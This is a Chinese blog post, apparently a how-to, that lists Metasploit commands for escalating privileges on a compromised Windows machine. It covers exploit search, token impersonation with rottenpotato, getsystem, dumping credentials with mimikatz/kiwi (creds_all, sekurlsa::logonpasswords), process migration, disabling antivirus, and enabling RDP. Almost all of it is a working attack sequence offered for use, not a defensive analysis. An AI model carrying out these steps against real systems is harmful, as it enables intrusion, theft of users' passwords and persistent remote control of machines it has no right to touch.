天天看点

msf提权常用命令

一、信息收集

当我们的msf普通权限成功连接后,如图:

msf提权常用命令

 shell进入命令行模式:

msf提权常用命令

 存在中文乱码,<code>chcp 65001</code>将编码格式改为utf-8:

msf提权常用命令

 将systeminfo信息输出到文档info.txt:

msf提权常用命令

 exit退出当前终端。

下载systeminfo信息 download c:\\users\\root\\Desktop\\info1.txt  /mnt/hgfs/share/info1.txt:

msf提权常用命令

 将syteminfo信息通过工具筛选可能存在的提权漏洞。

如疑似存在漏洞ms16-075。将当前会话放置 后台background,查看后台会话:

msf提权常用命令

 search ms16-075,搜索漏洞利用模块:

msf提权常用命令

 use 1,使用模块,info查看漏洞信息

msf提权常用命令

 options查看配置。最后run执行,发现执行出错,网上找一些好的payload上传

Getuid 查看当前权限

Getsystem 自动化提升

先进入会话 sessions -i n

msf提权常用命令

 上传本地恶意文件到目标机器 ,尽量不要直接上传到C盘根目录会报错。

msf提权常用命令

 list_tokens -u //列出当前存在的令牌

execute -cH -f C:/users/root/rottenpotato.exe 创建新进程

impersonate_token “NT AUTHORITY\\SYSTEM” //模仿windows system令牌,有时候一次不会成功,多试几次

最终提权失败。

使用模块:<code>use multi/recon/local_exploit_suggester 来识别当前系统中可用的exp</code>

msf提权常用命令
msf提权常用命令

 检测出几个可能利用的漏洞逐一尝试。

提权成功后即为system权限。

到system权限后总思路为远程,首先使用猕猴桃将密码读出,然后打开3389端口

首先关杀软:

运行<code>load mimikatz</code>,版本msf6中,mimikatz被<code>kiwi模块</code>合并了。

查看kiwi的使用指南:<code>help kiwi</code>

三步走:列举所有凭据:<code>creds_all</code>

列举所有kerberos凭据:<code>creds_kerberos</code>

调用kiwi_cmd执行mimikatz命令:<code>kiwi_cmd sekurlsa::logonpasswords</code>

  Kiwi的使用,发现执行命令没有结果或报错。

<code>ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process</code>。这是因为你上传的是X86的吗,需要迁移进程到x64的

使用命令:getuid查看当前进程号

然后ps查看所有进程,找到适合迁移的进程,且为system权限。

使用命令:migrate 7240迁移进程到其他id

最后的打开3389端口:run post/windows/manage/enable_rdp

下一篇: css

继续阅读